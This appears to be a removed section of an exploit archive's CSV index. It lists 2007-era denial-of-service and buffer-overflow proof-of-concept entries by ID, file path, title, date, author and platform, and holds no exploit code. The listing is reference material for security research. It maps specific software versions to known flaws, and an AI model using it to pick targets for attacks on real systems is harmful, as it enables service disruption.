-3127,exploits/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos, -3128,exploits/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos, -3130,exploits/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos, -3138,exploits/windows/dos/3138.pl,"Twilight WebServer 1.3.3.0 - 'GET' Remote Denial of Service",2003-07-07,anonymous,windows,dos, -3139,exploits/osx/dos/3139.rb,"Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service",2007-01-17,MoAB,osx,dos, -3142,exploits/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos, -3151,exploits/osx/dos/3151.rb,"Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos, -3155,exploits/windows/dos/3155.html,"BrowseDialog Class 'ccrpbds6.dll' Internet Explorer 7 - Denial of Service",2007-01-18,shinnai,windows,dos, -3157,exploits/windows/dos/3157.html,"DivX Player 6.4.1 - DivXBrowserPlugin 'npdivx32.dll' IE Denial of Service",2007-01-19,shinnai,windows,dos, -3160,exploits/osx/dos/3160.html,"Transmit.app 3.5.5 - 'ftps://' URL Handler Heap Buffer Overflow (PoC)",2007-01-20,MoAB,osx,dos, -3166,exploits/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos, -3167,exploits/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption",2007-01-21,"Adriano Lima",osx,dos, -3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos, -3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,windows,dos, -3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos, -3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos, -3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos, -3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos, -3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos, -3229,exploits/windows/dos/3229.py,"Dev-C++ 4.9.9.2 - '.CPP' File Parsing Local Stack Overflow (PoC)",2007-01-30,shinnai,windows,dos, -3230,exploits/osx/dos/3230.rb,"Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities",2007-01-30,MoAB,osx,dos, -3248,exploits/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 - 'catirpc.dll' RPC Server Denial of Service",2007-02-01,Shirkdog,windows,dos, -3254,exploits/windows/dos/3254.py,"Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)",2007-02-02,shinnai,windows,dos, -3257,exploits/osx/dos/3257.php,"Chicken of the VNC 2.0 - 'NULL-pointer' Remote Denial of Service",2007-02-02,poplix,osx,dos, -3272,exploits/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference",2007-02-05,AmesianX,windows,dos, -3276,exploits/windows/dos/3276.cpp,"FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service",2007-02-06,Marsu,windows,dos, -3277,exploits/windows/dos/3277.cpp,"SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service",2007-02-06,Marsu,windows,dos, -3289,exploits/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos, -3290,exploits/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos, -3304,exploits/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos, -3306,exploits/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos, -3307,exploits/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos, -3308,exploits/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos, -3331,exploits/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos, -3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,windows,dos, -3343,exploits/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos, -3347,exploits/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)",2007-02-20,Marsu,windows,dos, -3350,exploits/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities",2007-02-21,shinnai,windows,dos, -3362,exploits/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos, -3385,exploits/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos, -3392,exploits/windows/dos/3392.html,"DivX Web Player 1.3.0 - 'npdivx32.dll' Remote Denial of Service",2007-03-01,shinnai,windows,dos, -3394,exploits/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow (PoC)",2007-03-01,"Stefan Esser",multiple,dos, -3396,exploits/linux/dos/3396.php,"PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC)",2007-03-02,"Stefan Esser",linux,dos, -3399,exploits/windows/dos/3399.txt,"Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String",2007-03-02,"Luigi Auriemma",windows,dos, -3404,exploits/multiple/dos/3404.php,"PHP 5 - 'wddx_deserialize()' String Append Crash",2007-03-04,"Stefan Esser",multiple,dos, -3407,exploits/multiple/dos/3407.c,"Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos, -3415,exploits/linux/dos/3415.html,"Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service",2007-03-05,mark,linux,dos, -3418,exploits/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos, -3419,exploits/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos, -3421,exploits/windows/dos/3421.html,"Macromedia 10.1.4.20 - 'SwDir.dll' Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,windows,dos, -3430,exploits/windows/dos/3430.html,"Adobe Reader Plugin 'AcroPDF.dll' 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos, -3432,exploits/windows/dos/3432.pl,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service",2007-03-08,"Umesh Wanve",windows,dos, -3433,exploits/windows/dos/3433.html,"Rediff Toolbar - ActiveX Control Remote Denial of Service",2007-03-08,"Umesh Wanve",windows,dos, -3434,exploits/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - 'fragementation' Remote Denial of Service",2007-03-08,Antimatt3r,multiple,dos, -3441,exploits/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)",2007-03-09,"Daniel Roethlisberger",linux,dos, -3444,exploits/windows/dos/3444.pl,"Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos, -3453,exploits/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos, -3461,exploits/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos, -3464,exploits/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos, -3514,exploits/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos, -3526,exploits/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service",2007-03-20,MADYNES,hardware,dos, -3527,exploits/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos, -3535,exploits/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - Digest domain Denial of Service",2007-03-21,MADYNES,hardware,dos, -3547,exploits/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos, -3566,exploits/multiple/dos/3566.pl,"Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos, -3586,exploits/linux/dos/3586.php,"PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos, -3602,exploits/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos, -3606,exploits/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos, -3674,exploits/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - Long Directory Name Denial of Service",2007-04-05,WiLdBoY,windows,dos, -3684,exploits/windows/dos/3684.c,"Microsoft Windows Explorer - '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos, -3690,exploits/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos, -3693,exploits/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos, -3709,exploits/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos, -3715,exploits/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Denial of Service",2007-04-12,shinnai,windows,dos, -3726,exploits/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos, -3768,exploits/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos, -3769,exploits/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos, -3770,exploits/windows/dos/3770.pl,"Foxit Reader 2.0 - 'PDF' Remote Denial of Service",2007-04-20,n00b,windows,dos, -3782,exploits/windows/dos/3782.pl,"Winamp 5.33 - '.avi' Remote Denial of Service",2007-04-23,DeltahackingTEAM,windows,dos, -3784,exploits/multiple/dos/3784.c,"Opera 9.2 - '.torrent' Remote Denial of Service",2007-04-23,n00b,multiple,dos, -3788,exploits/windows/dos/3788.html,"Second Sight Software - ActiveGS.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos, -3789,exploits/windows/dos/3789.html,"Second Sight Software - ActiveMod.ocx ActiveX Buffer Overflow (PoC)",2007-04-24,"Umesh Wanve",windows,dos, -3790,exploits/windows/dos/3790.html,"NetSprint Toolbar - ActiveX 'toolbar.dll' Denial of Service (PoC)",2007-04-24,"Umesh Wanve",windows,dos, -3791,exploits/hardware/dos/3791.pl,"Linksys SPA941 - '\377' Character Remote Denial of Service",2007-04-24,MADYNES,hardware,dos, -3792,exploits/hardware/dos/3792.pl,"Linksys SPA941 - Remote Reboot (Denial of Service)",2007-04-24,MADYNES,hardware,dos, -3807,exploits/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,linux,dos, -3819,exploits/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,windows,dos, -3826,exploits/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - ActiveX Control Denial of Service",2007-05-01,shinnai,windows,dos, -3830,exploits/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Denial of Service Vulnerabilities",2007-05-02,shinnai,windows,dos, -3836,exploits/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,windows,dos, -3845,exploits/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Denial of Service Vulnerabilities",2007-05-04,shinnai,windows,dos, -3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,multiple,dos, -3866,exploits/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service",2007-05-07,shinnai,windows,dos, -3871,exploits/multiple/dos/3871.html,"Opera 9.10 - 'alert()' Remote Denial of Service",2007-05-08,Dj7xpl,multiple,dos, -3873,exploits/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - 'scvncctrl.dll' Denial of Service",2007-05-08,shinnai,windows,dos, -3883,exploits/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)",2007-05-09,shinnai,windows,dos, -3890,exploits/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,windows,dos, -3891,exploits/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service",2007-05-10,shinnai,windows,dos, -3898,exploits/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)",2007-05-11,callAX,windows,dos, -3910,exploits/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service",2007-05-12,shinnai,windows,dos, -3917,exploits/windows/dos/3917.html,"ID Automation Linear Barcode - ActiveX Denial of Service",2007-05-13,shinnai,windows,dos, -3921,exploits/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)",2007-05-14,shinnai,windows,dos, -3926,exploits/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service",2007-05-15,"Kristian Hermansen",windows,dos, -3929,exploits/windows/dos/3929.txt,"BitsCast 0.13.0 - invalid string Remote Denial of Service",2007-05-15,gbr,windows,dos, -3930,exploits/windows/dos/3930.txt,"NewzCrawler 1.8 - invalid string Remote Denial of Service",2007-05-15,gbr,windows,dos, -3937,exploits/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service",2007-05-16,shinnai,windows,dos, -3939,exploits/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos, -3940,exploits/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service",2007-05-16,Shirkdog,windows,dos, -3945,exploits/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos, -3965,exploits/windows/dos/3965.pl,"Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos, -3969,exploits/windows/dos/3969.html,"LeadTools ISIS Control - 'ltisi14E.ocx 14.5.0.44' Remote Denial of Service",2007-05-22,shinnai,windows,dos, -3973,exploits/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,windows,dos, -3976,exploits/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos, -3977,exploits/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - Description Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos, -3978,exploits/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)",2007-05-24,n00b,windows,dos, -3979,exploits/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)",2007-05-24,shinnai,windows,dos, -3986,exploits/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,windows,dos, -4009,exploits/windows/dos/4009.html,"EDraw Office Viewer Component - Denial of Service",2007-05-30,shinnai,windows,dos, -4011,exploits/windows/dos/4011.html,"LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos, -4012,exploits/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption",2007-05-30,shinnai,windows,dos, -4017,exploits/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)",2007-05-31,n00b,windows,dos, -4033,exploits/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",windows,dos, -4038,exploits/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos, -4044,exploits/windows/dos/4044.txt,"Microsoft Windows - GDI+ '.ICO' File Remote Denial of Service",2007-06-07,Kad,windows,dos, -4046,exploits/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,windows,dos, -4047,exploits/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service",2007-06-08,mu-b,windows,dos, -4056,exploits/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow (PoC)",2007-06-09,DeltahackingTEAM,windows,dos, -4058,exploits/windows/dos/4058.py,"Ace-FTP Client 1.24a - Remote Buffer Overflow (PoC)",2007-06-10,n00b,windows,dos, -4067,exploits/windows/dos/4067.html,"Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)",2007-06-13,"YAG KOHHA",windows,dos, -4118,exploits/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer - SMIL wallclock Stack Overflow (PoC)",2007-06-27,axis,windows,dos, -4120,exploits/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)",2007-06-27,str0ke,windows,dos, -4121,exploits/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name (PoC)",2007-06-27,ZhenHan.Liu,windows,dos, -4126,exploits/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow (PoC)",2007-06-29,r0ut3r,windows,dos, -4137,exploits/windows/dos/4137.html,"HP Instant Support - Driver Check Remote Buffer Overflow (PoC)",2007-07-02,shinnai,windows,dos, -4148,exploits/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos, -4149,exploits/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos, -4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,windows,dos, -4175,exploits/multiple/dos/4175.php,"PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service",2007-07-12,shinnai,multiple,dos, -4181,exploits/multiple/dos/4181.php,"PHP 5.2.3 - 'glob()' Denial of Service",2007-07-14,shinnai,multiple,dos, -4196,exploits/multiple/dos/4196.c,"Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service",2007-07-18,fbffff,multiple,dos, -4205,exploits/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) - Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos, -4215,exploits/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos, -4216,exploits/linux/dos/4216.pl,"Xserver 0.1 Alpha - POST Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos, -4227,exploits/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos, -4249,exploits/multiple/dos/4249.rb,"Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash",2007-07-31,tenkei_ev,multiple,dos, -4251,exploits/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos, -4260,exploits/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,multiple,dos, -4272,exploits/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) - Denial of Service",2007-08-09,"Martin Kluge",windows,dos, -4281,exploits/windows/dos/4281.c,"WengoPhone 2.x - SIP Phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos, -4285,exploits/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos, -4288,exploits/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos, -4289,exploits/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos, -4293,exploits/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,win_x86,dos, -4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos, -4297,exploits/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos, -4298,exploits/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,hardware,dos, -4304,exploits/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos, -4318,exploits/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,win_x86,dos, -4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos, -4335,exploits/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - 'webcam' Remote Crash",2007-08-29,wushi,windows,dos, -4337,exploits/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos, -4344,exploits/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos, -4347,exploits/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos, -4359,exploits/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos, -4369,exploits/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos, -4373,exploits/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,windows,dos, -4375,exploits/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflows (PoC)",2007-09-08,ZhenHan.Liu,windows,dos, -4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos, -4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos, -4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,windows,dos, -4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos, -4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos, -4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,windows,dos, -4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,windows,dos, -4498,exploits/windows/dos/4498.pl,"WzdFTPD 0.8.0 - 'USER' Remote Denial of Service",2007-10-07,k1tk4t,windows,dos, -4532,exploits/linux/dos/4532.pl,"eXtremail 2.1.1 - 'memmove()' Remote Denial of Service",2007-10-15,mu-b,linux,dos, -4535,exploits/linux/dos/4535.pl,"eXtremail 2.1.1 - Remote Heap Overflow (PoC)",2007-10-15,mu-b,linux,dos, -4540,exploits/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service",2007-10-16,ikki,multiple,dos, -4559,exploits/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,multiple,dos, -4560,exploits/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,multiple,dos, -4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",windows,dos, -4600,exploits/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos, -4601,exploits/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos, -4610,exploits/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,windows,dos, -4613,exploits/windows/dos/4613.html,"Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)",2007-11-08,Elazar,windows,dos, -4615,exploits/multiple/dos/4615.txt,"MySQL 5.0.45 - 'Alter' Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos, -4624,exploits/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos, -4648,exploits/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos, -4682,exploits/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos, -4683,exploits/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos, -4688,exploits/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos, -4689,exploits/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos, -4690,exploits/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos, -4692,exploits/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos, -4716,exploits/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos, -4717,exploits/windows/dos/4717.py,"Simple HTTPd 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,windows,dos, -4723,exploits/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos, -4732,exploits/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,linux,dos, -4742,exploits/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos, -4748,exploits/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos, 